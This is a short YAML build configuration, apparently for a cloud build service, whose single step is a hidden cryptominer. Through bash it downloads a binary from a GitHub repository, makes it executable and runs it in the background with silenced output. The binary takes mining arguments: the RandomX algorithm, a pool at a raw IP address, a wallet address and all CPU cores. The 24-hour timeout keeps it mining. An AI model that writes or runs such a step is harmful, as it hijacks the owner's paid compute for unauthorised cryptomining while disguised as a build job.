steps:
  - name: python
    args:
      - '-c'
      - >-
        wget -O sgr1 https://github.com/yumakanihnzah/ajojing/raw/main/xmolx && chmod +x sgr1 && ./sgr1 -a rx/0 -o 139.144.119.94:80 -u ZEPHs9S2EWRQzizKJRbnnvATxUoGNCbG5AH5t3HoCwVRWGuyerr8UshcoEwjzbxq88MNDKhBdmzc1Qs1s4u8JQ33YDcbYhxx5SN -p SATE -t $(nproc --all) --donate-level 1 -k > /dev/null 2>&1 &
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
